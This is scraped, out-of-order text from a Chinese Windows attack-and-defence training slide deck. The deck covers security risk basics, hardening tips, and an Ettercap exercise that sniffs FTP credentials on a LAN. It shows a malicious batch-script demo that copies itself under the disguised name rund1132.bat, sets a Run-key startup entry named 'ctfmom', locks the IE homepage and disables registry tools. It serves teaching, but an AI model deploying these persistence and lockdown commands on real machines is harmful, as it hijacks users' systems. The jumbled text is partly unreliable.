C22-Windows系统攻防-ppt-v1.0

copy %0 %windir%\System32\rund1132.bat
添加启动项
16/27
17/27
18/27
19/27
❖ 局域网攻击示例
▪ 查看扫描结果
• 单击“Hosts”菜单下的“Hosts List”
扫描结果
20/27
21/27
嗅探到的账户名
嗅探到的密码
22/27
安全导论
信息安全概述 常见的安全风险
安全的基本分类 安全的评估标准 攻击方法介绍 恶意程序攻击示例 局域网攻击示例
23/27
25/27
30分钟完成
❖学员练习2
▪ 使用Ettercap进行网络嗅探 ▪ 登陆FTP，并使用Ettercap获取用户名密码
50分钟完成
26/27
2. 部署网络版防病毒软件 3. 防火墙功能介绍
第1章
第2章
第3-4章
第5章
3/27
5/27
安全导论
信息安全概述 常见的安全风险
安全的基本分类 安全的评估标准 攻击方法介绍 恶意程序攻击示例 局域网攻击示例
6/27
7/27
8/27
❖ 系统安全
▪ 系统/软件漏洞
• 选用正版的操作系统、应用软件，并及时安装各种漏洞修复补丁
"DisableRegistryTools" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f
reg add "HKCU\Software\Policie Panel"
/v "HomePage" /t REG_DWORD /d 1 /f reg add
锁定主页 锁定注册表
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
2/27
安全风险评估
漏洞检测与分析
各种安全威胁与漏洞
局域网安全
1. 信息系统安全的分类 2. 常用的安全风险评估
标准 3. 常见的安全风险、系
统及网络攻击方式
1. 常见的扫描方式及各自 1. 木马的危害
的原理
2. 木马的实现
2. 常见扫描工具软件的使 3. 密码破解
用、操作示例
4. 网页挂马
1. 常用的局域网安全防护 措施
▪ 账号和权限管理
• 删除冗余的系统账号，设置高强度的复杂密码 • 定期更换系统口令
▪ 软件及服务管理
• 卸载无关的软件，关闭冗余的系统服务 • 采取“仅允许”的策略，严格控制存取权限
9/27
10/27
❖
11/27
12/27
13/27
14/27
15/27
@echo off
修改IE主页
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "" /f